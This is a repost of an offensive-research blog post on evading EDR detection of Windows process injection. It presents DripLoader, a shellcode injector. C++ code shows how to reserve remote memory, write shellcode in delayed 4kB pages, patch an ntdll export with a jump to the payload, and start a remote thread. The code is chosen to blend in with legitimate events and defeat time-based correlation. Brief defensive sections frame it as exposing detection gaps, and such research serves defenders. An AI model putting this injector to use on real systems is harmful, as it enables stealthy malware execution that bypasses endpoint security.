Nytro
Posted May 11, 2021

Bypassing EDR real-time injection detection logic

This post is less about suppressing or bypassing event collection, and more about understanding EDR architecture design flaws, lazy detection logic and correlation, in order to minimize the chance of triggering alerts with events that are (at least partially) collected.

Some great posts on bypassing EDR agent collection:
- Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank)
- A tale of EDR bypass methods (@s3cur3th1ssh1t)
- FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec)
- Hell's Gate (@smelly__vx, @am0nsec)
- Halo's Gate - twin sister of Hell's Gate (sektor7)
- Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog)
- Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode)

Introduction

In the previous post we discussed how solutions that use reliable, kernel-based sources for remote memory allocation events can use them to identify many in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from usermode. Most notably, Microsoft uses ETW for this, though there are vendors who do it better.

Today I wanted to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting. Combined, the two give us a technique undetectable by MDATP and many other EDRs out there, as of today.

It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness of the inherent limitations of these solutions and of the need for in-house security R&D programs, or at least the use of well-engineered managed detection services for more complete coverage.

Check out my previous post on detecting process injection with kernel ETW.
T1055 vs EDR

Let's first take a look at what independent evaluations can tell us about process injections, and whether there is even anything to bypass. It's definitely good to know that the product you're using is not able to flag Meterpreter's migrate command or the process hollowing procedures from a 5+ year old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested and half a year to prepare if needed. Other than that, the value of the last evaluation in the context of injections is very limited: we are not getting the full picture of how much each vendor invests into researching TTPs relevant now and in the future, or of how robust the detection capability and data sources really are.

https://ela.st/mitre-round3

While some EDRs were not able to flag even the elementary techniques, many have improved their detection capability to the point that today it is not uncommon for red teams to consider process injection OPSEC-expensive. Experienced operators tend to tailor detection bypasses per solution, and in some environments they choose to avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management is under close surveillance.

We are going to talk about bypassing the mature solutions today. For the ones with T1055 misses in the evaluation, just use APC injection and you'll probably be fine. Let's first discuss the detection opportunities for anomalous remote thread creation.

CRT anomalies

The API getting the most attention has to be kernel32!CreateRemoteThread, but we are really talking about ntdll!NtCreateThreadEx, or the kernel mode target intercepted through kernel callbacks.

https://github.com/elastic/detection-rules

Here we have a basic detection for a specific Windows process: msbuild.exe creating a new thread in a remote process.
Even though the criticality of a potential true positive would be quite high, after testing the rule author decided it is only suitable for low severity (probably due to the FP rate), which likely degrades the rule to an IR label/enrichment in most environments. Such a simple detection rule is unlikely to be part of a mature EDR solution, where customers expect to receive high severity alerts for activities like this while keeping noise down so that their analysts can review and classify the important stuff.

https://github.com/FalconForceTeam/FalconFriday

A more generic, custom MDATP thread creation rule, built around the new FileProfile() enrichment function, detects extremely rare files creating threads in remote processes. It is very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form, as it would cause substantial amounts of false positives in certain environments and could prove difficult to maintain.

As an example, Defender logs most remote thread creations as labeled events, but low file prevalence is not a good enough indicator to trigger an alert, and there is more advanced logic in play. This is true for most decent EDRs.

CRT events logged by Defender

Understanding correlation

By "detections" and "alerts" I do not just mean labeled activity which can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint. (I also assume the platform is not so noisy as to be unusable.)

This is important to remember, as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or to generate incidents based on some risk score analysis often affectionately called "AI". This makes it difficult to judge whether a particular TTP would be detected in isolation.
Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most. On-agent detections, activity inventories and software inventories are often not implemented, or are limited in scope, due to reverse engineering concerns or architectural difficulties.

We will exploit this fact later on when building our shellcode injector, by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks, where IDS solutions tend to detect based on thresholds.

For the same reason, choosing your EDR vendor based on the numerical results of things like the MITRE evaluation and percentage of coverage is not a good idea. Among other issues, the test rounds are executed in an unrealistically short time window of around 30 minutes for the whole attack kill chain, which means time correlation of labeled events from the host to a single alert is good enough to score 100% coverage.

High fidelity alerts

So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection. It forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events.
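To make the time-based correlation described above more concrete, here is a minimal defender-side sketch in C++. The Event struct, its field names, and the CorrelateByTime function are hypothetical and do not reflect any vendor's schema or logic; the only assumption is that labeled events get linked to an anchor alert when they fall within a fixed time window.

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical event record; field names are illustrative only.
struct Event {
    std::uint64_t timestampMs;  // time the event was observed on the host
    std::string   label;        // e.g. "VM_ALLOC", "THREAD_START"
};

// Return the events that fall within windowMs of the anchor alert
// (before or after it). Anything outside the window is not linked.
std::vector<Event> CorrelateByTime(const std::vector<Event>& events,
                                   std::uint64_t anchorMs,
                                   std::uint64_t windowMs) {
    std::vector<Event> linked;
    for (const auto& e : events) {
        const std::uint64_t delta = (e.timestampMs > anchorMs)
                                        ? e.timestampMs - anchorMs
                                        : anchorMs - e.timestampMs;
        if (delta <= windowMs) linked.push_back(e);
    }
    return linked;
}
```

With a window like this, an event that arrives minutes after the anchor is simply never linked to it, which is the weakness that delays in execution take advantage of. A wider window closes that gap at the cost of keeping more context alive per host.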
For thread creation, the most common constraint is thread starting process ≠ hosting process, so only remote thread creation is monitored, usually also limited to threads with:
- thread start in an image-"unbacked" MEM_COMMIT-type segment
- the size of the segment being larger than X

At scale this will still generate a very significant amount of false positives, which may lead to further filtering, for example:
- thread location (target)
  - only in Windows built-in executables
  - only a subset of these
- thread initiator (source)
  - only in risky executables
  - unknown hashes
  - low file prevalence
  - risky paths (%userprofile%, %temp% etc.)
  - not seen on the network/on the host
- memory page contains suspicious stuff

Machine learning models are often employed to attempt to solve this issue, and so on. These assumptions will differ between vendors, but the idea is to tame thread creation.

The less mature solutions in fact often rely on thread creation hooking/callbacks as the only source of data for injection detection. While it is true that for the majority of injection techniques a new thread will be created in the target process at some point, the way in which it is created is often unexpected and makes monitoring infeasible. Relying exclusively on ntdll!NtCreateThread(Ex) hooking or thread creation callbacks is therefore an easily exploitable design flaw nowadays.

SetThreadContext

In the case of process hollowing or thread hijacking, our target thread has already been created legitimately by the Windows Loader or locally by the target application, and thus there is no thread creation to detect. This is one of the reasons CobaltStrike execute-assembly uses SetThreadContext instead of CRT injection on the sacrificial process.

Once we have the telemetry, at scale it is much easier to detect certain SetThreadContext anomalies than CRT injection, and today in many environments it generates high criticality alerts, rendering fork&run useless in stealthy offensive ops.
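As a rough illustration of the thread-creation constraints listed earlier in this section (remote only, start address not backed by an image, segment larger than X), here is a minimal C++ sketch of such a filter. The ThreadStartEvent struct, the RegionType enum, and IsFlagged are hypothetical names introduced for this example and are not taken from any EDR.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Loosely mirrors the MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE region types.
enum class RegionType { Image, Mapped, Private };

// Hypothetical thread-start record; fields are assumptions for illustration.
struct ThreadStartEvent {
    std::uint32_t sourcePid;        // process that created the thread
    std::uint32_t targetPid;        // process hosting the thread
    RegionType    startRegionType;  // type of memory at the start address
    std::size_t   startRegionSize;  // size of the region holding the start address
};

// Flag only remote threads that start in non-image memory inside a
// region larger than minRegionSize; everything else is logged and ignored.
bool IsFlagged(const ThreadStartEvent& e, std::size_t minRegionSize) {
    if (e.sourcePid == e.targetPid) return false;              // local thread
    if (e.startRegionType == RegionType::Image) return false;  // image-backed start
    return e.startRegionSize > minRegionSize;
}
```

Each early return is a place where volume forces the logic to give up, so any event whose logged properties look image-backed or local never reaches the size check at all.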
QueueUserAPC

Asynchronous Procedure Calls provide another avenue for avoiding thread creation. An APC can be queued for an existing thread, and is executed once that thread enters an alertable state.

In recent years userland hooking evasion has been getting a lot of coverage, and Early Bird injection has popularized the use of APCs for that purpose. The idea is to queue an APC in a newly spawned, suspended process, before the ntdll!LdrpInitializeProcess function has had a chance to run. That way our scheduled routine is executed before the hooking DLLs are loaded into the target process.

Once again, this technique becomes easy to detect when we stop relying solely on hooking.

DripLoader

DripLoader is an evasive shellcode loader (injector) for bypassing event-based injection detection, without necessarily suppressing event collection.

The project aims to highlight the limitations of event-driven injection identification, and to show the need for more advanced memory scanning and smarter local agent inventories in EDR.
DripLoader evades EDRs by:
- using the most risky APIs possible, like NtAllocateVirtualMemory and NtCreateThreadEx
- blending in with call arguments to create events that vendors are forced to drop or log&ignore due to volume
- avoiding multi-event correlation by introducing delays

Allocating memory

To bypass any memory allocation based logic we will only commit memory at page granularity, that is in PageSize-sized pages, which on Windows 10 with a modern processor is 4kB:
- this constant, found in the SYSTEM_INFO structure, tells us the lowest possible size of a VM allocation
- since most legitimate remote VM operations work on a single byte or a few bytes, 4kB is by far the most prevalent allocation size (>95%), making it extremely challenging to detect on

To accomplish this we need to deal with some inconveniences:
- we need our shellcode in memory as a contiguous byte sequence
  - which means we cannot let kernel32!VirtualAllocEx choose the base, as it might reserve memory at an address where the other allocations will not fit
- in Windows, any new VM allocation made with kernel32!VirtualAllocEx and similar is rounded up to AllocationGranularity, which is another constant found in SYSTEM_INFO and is usually 64kB
  - for example, if we allocate 4kB of MEM_COMMIT | MEM_RESERVE memory at 0x40000000, the whole 64kB region up to 0x40010000 will be unavailable for new allocations

Steps we take

- pre-define a list of 64 bit base addresses and VirtualQueryEx the target process to find the first region able to fit our shellcode blob

    const std::vector<LPVOID> VC_PREF_BASES{
        (void*)0x00000000DDDD0000,
        (void*)0x0000000010000000,
        (void*)0x0000000021000000,
        (void*)0x0000000032000000,
        (void*)0x0000000043000000,
        (void*)0x0000000050000000,
        (void*)0x0000000041000000,
        (void*)0x0000000042000000,
        (void*)0x0000000040000000,
        (void*)0x0000000022000000
    };

    LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
    {
        MEMORY_BASIC_INFORMATION mbi;
        for (auto base : VC_PREF_BASES) {
            VirtualQueryEx(
                hProc,
                base,
                &mbi,
                sizeof(MEMORY_BASIC_INFORMATION)
            );
            if (MEM_FREE == mbi.State) {
                uint64_t i;
                for (i = 0; i < cVmResv; ++i) {
                    LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
                    VirtualQueryEx(
                        hProc,
                        currentBase,
                        &mbi,
                        sizeof(MEMORY_BASIC_INFORMATION)
                    );
                    if (MEM_FREE != mbi.State)
                        break;
                }
                if (i == cVmResv) {
                    // found suitable base
                    return base;
                }
            }
        }
        return nullptr;
    }

- reserve the required number of full AllocationGranularity (64kB) sized regions, and then loop over those committing 4kB pages to ensure page alignment

    // MEM_RESERVE, NO_ACCESS, 64kB
    for (i = 1; i <= cVmResv; ++i) {
        // sleeps here
        ANtAVM(
            hProc,
            &currentVmBase,
            NULL,
            &szVmResv,
            MEM_RESERVE,
            PAGE_NOACCESS
        );
        if (STATUS_SUCCESS == status)
            vcVmResv.push_back(currentVmBase);
        else
            return 4;
        currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
    }

    // MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB
    for (i = 0; i < cVmResv; ++i) {
        for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i) {
            DWORD offset = (cmm_i * szVmCmm);
            currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);
            ANtAVM(
                hProc,
                &currentVmBase,
                NULL,
                &szVmCmm,
                MEM_COMMIT,
                PAGE_READWRITE
            );
            // sleeps here
            SIZE_T szWritten{ 0 };
            ANtWVM(
                hProc,
                currentVmBase,
                &shellcode[offsetSc],
                szVmCmm,
                &szWritten
            );
            offsetSc += szVmCmm;
            // sleeps here
            ANtPVM(
                hProc,
                &currentVmBase,
                &szVmCmm,
                PAGE_EXECUTE_READ,
                &oldProt
            );
        }
    }

The pages are also written to and individually reprotected with each run, to avoid a large RegionSize of the target memory page in the properties of logged VirtualProtectEx events. (TiEtw provides this, and hooks can too.)

Creating the thread

Now that we have our shellcode in the remote process we need to initiate its execution. To do this we will use the NtCreateThreadEx native API, which is the ntdll target of CRT and hence very commonly called by legitimate software.
To bypass any detections we will:
- create the new thread from a MEM_IMAGE base address
- moreover, use a known-good module loaded by the Windows Loader, ntdll.dll
- patch the location with a far jmp to our shellcode base at the time of thread creation

Note that we do not need to run in a MEM_IMAGE segment, as we only care about the logging of arguments in the TiEtw/hook event.

If our shellcode creates a new thread (which would happen, for example, when using sRDI beacon.dll), the locally created thread won't be flagged by most EDRs, but it will no longer have ntdll as its start address, which could get it detected by basic Endpoint Protection and will get it detected by Get-InjectedThread.

Steps we take

- figure out the RVA of the function we will hijack

    // ntdll.dll
    char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' };
    // RtlpWow64CtxFromAmd64
    char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' };

    LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base)
    {
        unsigned char* b = (unsigned char*)&vm_base;
        unsigned char jmpSc[7]{
            0xB8, b[0], b[1], b[2], b[3],
            0xFF, 0xE0
        };

        // find the export EP offset
        HMODULE hJmpMod = LoadLibraryExA(
            jmpModName,
            NULL,
            DONT_RESOLVE_DLL_REFERENCES
        );
        if (!hJmpMod)
            return nullptr;

        LPVOID lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);
        DWORD offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod;
        [...]
    }

- find the base of the remote ntdll and calculate AVA

    [...]
    LPVOID lpRemFuncEP{ 0 };
    HMODULE hMods[1024];
    DWORD cbNeeded;
    char szModName[MAX_PATH];
    if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded)) {
        int i;
        for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++) {
            if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char))) {
                if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) {
                    lpRemFuncEP = hMods[i];
                    break;
                }
            }
        }
    }
    lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc);
    [...]

- overwrite the function prologue with a jmp

    [...]
    if (NULL == lpRemFuncEP)
        return nullptr;

    SIZE_T szWritten{ 0 };
    WriteProcessMemory(
        hProc,
        lpDllExport,
        jmpSc,
        sizeof(jmpSc),
        &szWritten
    );
    return lpDllExport;
    }

- CreateRemoteThread

The full source and more explanations can be found on GitHub: xinbailu/DripLoader - Evasive shellcode loader for bypassing event-based injection detection (PoC)

Result

1. The activity will generate events with the following characteristics

    // reservations
    VM_ALLOC: REMOTE: 1, SIZE: 0x10000, TYPE: 0x2000, PROT: 0x01 (-)
    // commits
    VM_ALLOC: REMOTE: 1, SIZE: 0x1000, TYPE: 0x1000, PROT: 0x04 (rw)
    VM_WRITE: REMOTE: 1, SIZE: 0x1000
    THREAD_START: REMOTE: 1, SUSPENDED: 0, ACCMSK: 0xFFFF (full), PAGE_TYPE: 0x1000000 (img), LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0

2. State of the target process (assuming the shellcode does not create a thread)

Defense recommendations

Option #1: Monitor injection APIs yourself
- EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected
- aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team

Source: https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection